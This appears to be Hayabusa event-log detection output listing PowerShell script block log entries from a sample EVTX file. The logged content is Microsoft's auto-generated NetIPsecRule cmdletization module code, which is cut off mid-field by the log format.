[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, 
[Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 